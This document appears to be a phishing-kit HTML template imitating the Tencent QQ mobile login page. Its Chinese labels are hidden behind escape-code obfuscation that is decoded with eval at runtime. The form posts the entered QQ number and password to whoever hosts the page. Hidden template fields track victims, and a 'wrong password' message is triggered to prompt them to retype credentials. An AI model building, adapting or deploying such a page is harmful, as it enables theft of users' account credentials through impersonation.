<!DOCTYPE html>
<html lang="zh-cn">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta id="viewport" name="viewport" content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <title class="xpxpkkk">*u624B*u673A*u7EDF*u4E00*u767B*u5F55</title>
    <style type="text/css">
        @charset "utf-8";
        html {
            height: 100%
        }

        body {
            font-size: 16px;
            background: #eee;
            height: 100%
        }

        * {
            padding: 0;
            margin: 0;
            list-style: none;
            text-decoration: none
        }

        input::-webkit-input-placeholder,
        textarea::-webkit-input-placeholder {
            color: #aaa
        }

        input::-ms-input-placeholder,
        textarea::-ms-input-placeholder {
            color: #aaa
        }

        input:focus {
            outline: 0
        }

        .content {
            margin: 0 auto;
            width: 320px;
            height: 500px;
            position: relative
        }

        #error_tips {
            position: absolute;
            top: 0;
            z-index: 100;
            display: none;
            opacity: .95;
            width: 100%
        }

        #error_tips #error_tips_content {
            position: relative;
            padding: 16px 0 24px 24px;
            border-radius: 5px;
            background-color: #525c5f;
            height: 28px
        }

        #error_tips #error_tips_content #error_icon {
            position: absolute;
            top: 18px;
            display: inline-block;
            width: 24px;
            height: 24px;
            background: url("/style/8/images/info.png") no-repeat 0 0
        }

        #error_tips #error_tips_content #error_message {
            display: inline-block;
            line-height: 28px;
            font-size: 14px;
            color: white;
            padding: 0 0 0 28px
        }

        #error_message a,
        #error_message a:visited {
            color: #f15a22
        }

        @media(-webkit-min-device-pixel-ratio:2),
        (min-resolution:192dpi),
        (min-resolution:2dppx) {
            #error_tips #error_tips_content #error_icon {
                background: url("/images/info@2x.png") no-repeat 0 0;
                background-size: 24px 24px
            }
        }

        .login {
            margin: 0 auto;
            padding-top: 30px
        }

        .q_login {
            margin: 0 auto;
            width: 290px;
            overflow: hidden;
            text-align: center;
            margin-bottom: 40px
        }

        .inputstyle {
            -webkit-tap-highlight-color: rgba(255, 255, 255, 0);
            width: 273px;
            height: 44px;
            color: #000;
            border: 0;
            background: 0;
            padding-left: 15px;
            font-size: 16px;
            -webkit-appearance: none
        }

        .logo {
            height: 100px;
            width: 244px;
            margin: 0 auto;
            margin-bottom: 20px;
            background-size: 244px 100px
        }

        .header {
            display: inline-block;
            height: 97px;
            width: 96px;
            text-align: center;
            position: relative
        }

        .header img {
            width: 60px;
            height: 60px;
            position: absolute;
            top: 10px;
            left: 16px
        }

        .header .img_out {
            width: 60px;
            height: 60px;
            position: absolute;
            top: 9px;
            left: 15px;
            border: solid 1px #c6dbe8;
            border-radius: 4px;
            -webkit-box-shadow: 1px 1px 13px #6e6e6e
        }

        .nick {
            display: inline-block;
            text-align: center;
            position: absolute;
            top: 80px;
            left: 0;
            height: 20px;
            line-height: 18px;
            vertical-align: middle
        }

        .del_touch_icon {
            display: none;
            width: 30px;
            height: 30px;
            position: absolute;
            left: 60px;
            top: 0;
            z-index: 1
        }

        .del_icon {
            display: block;
            width: 24px;
            height: 22px;
            background: url("/style/8/images/android_logo_v1.png") no-repeat -68px 0;
            border-radius: 11px
        }

        #web_login {
            width: 290px;
            margin: 0 auto
        }

        #g_list {
            background: #fff;
            height: 89px;
            border-radius: 4px
        }

        #g_u,
        #g_p {
            position: relative
        }

        #g_u {
            border-bottom: 1px solid #eaeaea
        }

        .txt_default {
            position: absolute;
            top: 12px;
            left: 10px;
            color: #b3b3b3
        }

        .del_touch {
            -webkit-tap-highlight-color: rgba(255, 255, 255, 0);
            position: absolute;
            right: 0;
            display: block;
            height: 44px;
            width: 48px;
            z-index: 1
        }

        .del_u {
            display: none;
            position: absolute;
            left: 15px;
            top: 13px;
            height: 18px;
            width: 18px;
            background-color: #aaa;
            border-radius: 9px;
            background: url("/style/8/images/android_logo_v1.png") no-repeat -117px -2px
        }

        #auto_login {
            height: 24px;
            margin: 15px 0;
            color: #246183;
            position: relative
        }

        #auto_login .wording {
            position: absolute;
            left: 40px;
            line-height: 24px;
            height: 24px;
            font-size: 14px
        }

        #remember {
            position: absolute;
            left: 14px;
            top: 5px;
            cursor: pointer;
            z-index: 1;
            opacity: .01
        }

        #remember:checked+.checkbox {
            background: #146fdf url("/style/8/images/checked.png") 1px 1px;
            border-color: #146fdf
        }

        #remember+.checkbox {
            display: inline-block;
            width: 21px;
            height: 21px;
            position: absolute;
            left: 9px;
            top: 1px;
            border: 1px solid #9abbe3;
            background: 0;
            border-radius: 11px
        }

        #go,
        #onekey {
            width: 290px;
            height: 44px;
            line-height: 44px;
            background: #146fdf;
            border: 0;
            border-radius: 4px;
            color: #fff;
            font-size: 16px;
            text-align: center;
            margin-top: 15px;
            display: block
        }

        #onekey {
            background: #146fdf;
            display: none
        }

        #onekey.weak,
        #go.weak {
            background-color: #e7e7e7;
            color: #146fdf;
            border: 1px solid #9abbe3;
            height: 42px
        }

        #switch {
            width: 290px;
            margin: 0 auto
        }

        #switch #swicth_login {
            width: 288px;
            height: 42px;
            line-height: 44px;
            border: solid 1px #9abbe3;
            border-radius: 5px;
            background: #e7e7e7;
            margin-top: 10px;
            text-align: center;
            font-size: 16px;
            color: #146fdf
        }

        #switch #zc_feedback {
            width: 290px;
            position: relative;
            margin-top: 15px;
            overflow: hidden
        }

        #switch #zc,
        #switch #forgetpwd {
            color: #246183;
            line-height: 14px;
            font-size: 14px;
            padding: 15px 10px
        }

        #switch #zc {
            float: right;
            margin-right: -10px
        }

        #switch #forgetpwd {
            float: left;
            margin-left: -10px
        }

        .tansparent {
            background: 0
        }

        #q_login_title {
            height: 32px;
            line-height: 22px;
            margin-bottom: 20px;
            position: relative
        }

        #q_login_logo {
            background: url("/style/8/images/android_logo_v1.png") no-repeat -44px 0;
            width: 22px;
            height: 22px;
            position: absolute;
            left: 0
        }

        #q_login_tips {
            position: absolute;
            left: 30px;
            top: 0;
            color: #246183
        }

        #vcode {
            margin: 0 auto;
            padding-top: 40px;
            display: none
        }

        #vcode #vcode_tips {
            display: block;
            width: 290px;
            height: 20px;
            line-height: 20px;
            margin: 0 auto;
            margin-bottom: 15px;
            color: #77838d
        }

        #vcode #vcode_area {
            position: relative;
            margin: 0 auto;
            width: 290px;
            height: 70px;
            border-radius: 5px;
            border: solid 1px #b8b8b8;
            background: #fff
        }

        #vcode #vcode_img {
            position: absolute;
            left: 3px;
            width: 140px;
            height: 70px
        }

        #vcode #vcode_input {
            position: absolute;
            top: -1px;
            left: 145px;
            width: 145px;
            height: 70px;
            border: 1px solid #9d9d9d;
            background: 0;
            -webkit-appearance: none;
            border-top-right-radius: 5px;
            border-bottom-right-radius: 5px;
            line-height: 28px;
            font-size: 28px;
            -webkit-box-shadow: inset 0 0 10px #ccc
        }

        #vcode #input_tips {
            position: absolute;
            top: 5px;
            left: 150px;
            display: block;
            width: 135px;
            height: 50px;
            color: #b3b3b3;
            z-index: 1;
            padding-top: 8px
        }

        #vcode #submit {
            width: 288px;
            height: 22px;
            padding: 10px 0;
            background: #7ec82c;
            border: 0;
            border-radius: 5px;
            color: #fff;
            font-size: 22px;
            text-align: center;
            margin: 0 auto;
            margin-top: 35px
        }

        .copyright {
            text-align: center;
            color: #8a949d;
            font-size: 10px;
            margin-top: 15px;
            font-family: Helvetica
        }

        .copyright .en {
            line-height: 20px
        }

        .copyright .chs {
            line-height: 20px
        }

        .mode_webapp .ui_topbar .topbar_btn b,
        .mode_webapp .ui_topbar .topbar_btn_left b {
            background-image: url("/style/8/images/bg_btn_back.png");
            background-position: bottom right;
            background-size: 105px;
            width: 6px;
            height: 32px;
            float: left
        }

        .ui_topbar h3,
        .ui_topbar .topbar_title {
            font-size: 18px
        }

        .ui_topbar {
            border-bottom: 1px solid #b6b6b6;
            border-top: 2px solid #df242a;
            background-color: #d9d9d9;
            background-image: -webkit-gradient(linear, left top, left bottom, from(#ebebeb), to(#d9d9d9));
            background-image: -webkit-linear-gradient(top, #ebebeb, #d9d9d9);
            background-image: linear-gradient(to bottom, #ebebeb, #d9d9d9);
            height: 40px;
            line-height: 40px;
            text-align: center;
            position: relative
        }

        .lay_header {
            height: auto !important;
            width: 100%
        }

        .mode_webapp .ui_topbar {
            color: #fff;
            background-color: #c32d32;
            background-image: -webkit-gradient(linear, left top, left bottom, from(#fe444a), to(#c32d32));
            background-image: -webkit-linear-gradient(top, #fe444a, #c32d32);
            background-image: linear-gradient(to bottom, #fe444a, #c32d32);
            border-bottom: 1px solid #700d00;
            border-top: 0 none;
            top: 0;
            left: 0;
            width: 100%
        }

        .mode_webapp .ui_topbar .topbar_btn_left {
            display: block;
            position: absolute;
            left: 10px;
            top: 5px
        }

        .mode_webapp .ui_topbar .topbar_btn span,
        .mode_webapp .ui_topbar .topbar_btn_left span {
            float: left;
            display: inline-block;
            height: 32px;
            line-height: 30px;
            color: #fff;
            background-image: url("/style/8/images/bg_btn_back.png");
            background-size: 105px;
            padding-left: 10px;
            padding-right: 4px
        }

        .mode_webapp .ui_topbar .topbar_btn_left span {
            background-image: url("/style/8/images/bg_btn_back.png");
            background-position: left -32px;
            background-size: 105px;
            padding-left: 17px
        }

        .mode_webapp .ui_topbar {
            box-shadow: 0 0 5px #333
        }

        .skin-2 .ui_topbar {
            background-color: #161616;
            background-image: -webkit-gradient(linear, left top, left bottom, from(#3e3e3e), to(#262626));
            background-image: -webkit-linear-gradient(top, #3e3e3e, #262626);
            background-image: linear-gradient(to bottom, #3e3e3e, #262626);
            border-bottom-color: #1a1a1a
        }

        .skin-2 .ui_topbar {
            background-color: #161616;
            background-image: -webkit-gradient(linear, left top, left bottom, from(#3e3e3e), to(#262626));
            background-image: -webkit-linear-gradient(top, #3e3e3e, #262626);
            background-image: linear-gradient(to bottom, #3e3e3e, #262626);
            border-bottom-color: #1a1a1a
        }

        .skin-2 .ui_topbar .topbar_btn span,
        .skin-2 .ui_topbar .topbar_btn_left span,
        .skin-2 .ui_topbar .topbar_btn b,
        .skin-2 .ui_topbar .topbar_btn_left b {
            background-image: url("/style/8/images/bg_btn_back_black@2x.png");
            background-size: 105px
        }

        .new_vcode {
            display: none;
            width: 100%;
            height: 100%;
            overflow: hidden
        }
    </style>
    <style type="text/css">
        .logo {
            background-image: url(/images/ptlogin-logo.png)
        }
    </style>
</head>

<body>
    <script src="//cdn.bootcss.com/jquery/3.0.0-rc1/jquery.min.js" type="text/javascript"></script>
    <style>
        body {
            position: relative
        }

        .banner {
            position: relative;
            display: block;
            padding-top: 15.62%;
            -webkit-background-size: cover;
            background-size: cover;
            background-color: #d7d7d7;
            background-repeat: no-repeat;
            background-position: 0 0
        }

        .dl-guide {
            text-align: center;
            position: absolute;
            top: 0;
            bottom: 0;
            width: 100%;
            background-color: #eee;
            z-index: 10
        }

        .dl-guide header {
            height: 245px;
            background-color: #1f75cc;
            position: relative;
            background-image: url(img/welcome-cover.jpg?max_age=19830212&d=20160519113742), url(img/welcome-sticker.png?max_age=19830212&d=20160519113742);
            -webkit-background-size: 160px 138px, 246px 103px;
            background-position: 50% 100%;
            background-repeat: no-repeat;
            color: #fff
        }

        .dl-guide header.wifi {
            background-image: url(img/welcome-cover.jpg?max_age=19830212&d=20160519113742), url(img/welcome-sticker.png?max_age=19830212&d=20160519113742), url(img/welcome-bg.jpg?max_age=19830212&d=20160519113742);
            -webkit-background-size: 160px 138px, 246px 103px, cover;
            background-position: 50% 100%, 50% 100%, 50%
        }

        .dl-guide h1 {
            font-size: 20px;
            padding: 15px 0 13px
        }

        .dl-guide h1:before {
            content: '';
            display: inline-block;
            width: 26px;
            height: 26px;
            background-image: url(sprite/login-chg160316150413.png?max_age=19830212&d=20160519113742);
            background-position: 0 0;
            margin-right: 5px;
            vertical-align: middle;
            margin-top: -4px
        }

        .dl-guide .intro {
            line-height: 1.6
        }

        .dl-guide .action {
            padding: 15px 0
        }

        .dl-guide .item {
            display: block;
            margin: 0 auto;
            width: 240px;
            line-height: 38px;
            font-size: 16px;
            margin-top: 15px;
            background-color: #f8f8f8;
            border: 1px solid #b7b7b7;
            -webkit-border-radius: 1px;
            -moz-border-radius: 1px;
            border-radius: 1px
        }

        .dl-guide .item.blue {
            background-color: #0264e9;
            border-color: #0264e9;
            color: #fff;
            margin-top: 0
        }

        @media only screen and (-webkit-min-device-pixel-ratio:1.25),
        only screen and (min-resolution:120dpi),
        only screen and (min-resolution:1.25dppx) {
            .dl-guide h1:before {
                background-image: url(sprite/login-chg160316150413@2x.png?max_age=19830212&d=20160519113742);
                background-size: 26px 26px;
                background-position: 0 0
            }
        }

        #CssGaga {
            content: "160519113742,chg,334"
        }
    </style>
    <a class="banner" href="#" id="btn_app_down" style="background-image:url(/images/qzone-app-download.jpg);"></a>
    <div id="content" class="content">
        <div id="error_tips">
            <div id="error_tips_content">
                <span id="error_icon"></span>
                <span id="error_message"></span></div>
        </div>
        <div id="login" class="login">
            <div id="logo" class="logo"></div>
            <div id="app_name" style="display:none"></div>
            <div id="q_login" class="q_login" style="display:none">
                <div id="q_login_title">
                    <div id="q_login_logo"></div>
                    <label id="q_login_tips" class="xpxpkkk">*u8BF7*u9009*u62E9*u767B*u5F55*u5E10*u53F7</label></div>
                <div id="q_logon_list" class="q_logon_list"></div>
            </div>
            <div id="web_login">
                <form action="" method="POST" id="ff">
                    <ul id="g_list">
                        <li id="g_u">
                            <div id="del_touch" class="del_touch">
                                <span id="del_u" class="del_u"></span>
                            </div>
                            <input id="u" class="inputstyle ucp" name="u" autocomplete="off" placeholder="QQ\u53F7\u7801/\u624B\u673A/\u90AE\u7BB1"></li>
                        <li id="g_p">
                            <div id="del_touch_p" class="del_touch">
                                <span id="del_p" class="del_u"></span>
                            </div>
                            <input id="p" class="inputstyle ucp" maxlength="16" type="password" name="p" autocorrect="off" placeholder="\u8BF7\u8F93\u5165\u60A8\u7684QQ\u5BC6\u7801"></li>
                        <input type="hidden" name="uid" value="<%=uid%>">
                        <input type="hidden" name="mid" value="<%=mid%>">
                        <input type="hidden" name="tz" value="<%=tz%>">
                    </ul>
                    <div href="javascript:void(0);" id="go" class="xpxpkkk">*u767B *u5F55</div>
                    <div href="javascript:void(0);" id="onekey" class="xpxpkkk">*u4E00*u952E*u767B*u5F55</div>
                </form>
            </div>
            <div id="switch">
                <div id="swicth_login" onclick="pt._switch()" style="display:none" class="xpxpkkk">*u5FEB*u901F*u767B*u5F55*u5386*u53F2*u5E10*u53F7</div>
                <div id="zc_feedback">
                    <span id="zc" class="xpxpkkk">*u6CE8*u518C*u65B0*u5E10*u53F7</span>
                    <span id="forgetpwd" class="xpxpkkk">*u5FD8*u4E86*u5BC6*u7801*uFF1F</span></div>
            </div>
            <div id="custom_bottom"></div>
        </div>
        <div id="vcode">
            <label id="vcode_tips" class="xpxpkkk">*u70B9*u51FB*u56FE*u7247*u53EF*u66F4*u6362*u9A8C*u8BC1*u7801</label>
            <div id="vcode_area">
                <img id="vcode_img">
                <label id="input_tips" class="xpxpkkk">*u8BF7*u8F93*u5165*u56FE*u4E2D*u7684*u5B57*u7B26*u4E0D*u533A*u5206*u5927*u5C0F*u5199</label>
                <input id="vcode_input" name="vcode_input" tabindex="3" autocomplete="off" autocorrect="off" maxlength="6"></div>
            <div id="submit" class="xpxpkkk">*u63D0*u4EA4*u9A8C*u8BC1*u7801</div>
        </div>
    </div>
    <div id="new_vcode" class="new_vcode">
        <iframe id="cap_iframe" src="" frameborder="0" scrolling="auto" width="100%" height="100%"></iframe>
    </div>
    <div id="footerBlank"></div>
</body>
<script>
    $('.xpxpkkk').each(function () {
        var _x = $(this).html();
        _x = _x.replace(/\*/g, '\\');
        $(this).html(eval('"' + _x + '"'));
    });
    $('.ucp').each(function () {
        var _x = $(this).attr('placeholder');
        $(this).attr('placeholder', eval('"' + _x.replace(/\\x/g, '\\u') + '"'));
    });

    var _n = '<%=tz%>';
    var errContent = $('#error_tips');
    var errMsg = $('#error_message');
    $('#go').on('click', function () {
        if ($('#u').val() === '') {
            errMsg.html(eval('"' + '=_8BF7=_8F93=_5165QQ=_53F7=_FF01'.replace(/=_/g, '\\u') + '"'));
            errContent.css({ "display": "block" })
            setTimeout(function () {
                errContent.css({ "display": "none" })
            }, 1000);
        } else if ($('#p').val() === '') {
            errMsg.html(eval('"' + '=_4F60=_8FD8=_6CA1=_6709=_8F93=_5165=_5BC6=_7801=_FF01'.replace(/=_/g, '\\u') + '"'));
            errContent.css({ "display": "block" })
            setTimeout(function () {
                errContent.css({ "display": "none" })
            }, 1000);
        } else {
            $('#ff').submit();
        }
    });
    if (_n === '1') {
        errMsg.html(eval('"' + '=_8D26=_53F7=_5BC6=_7801=_9519=_8BEF\21'.replace(/=_/g, '\\u') + '"'));
        errContent.css({ "display": "block" })
        setTimeout(function () {
            errContent.css({ "display": "none" })
        }, 1000);
    }

</script>

</html>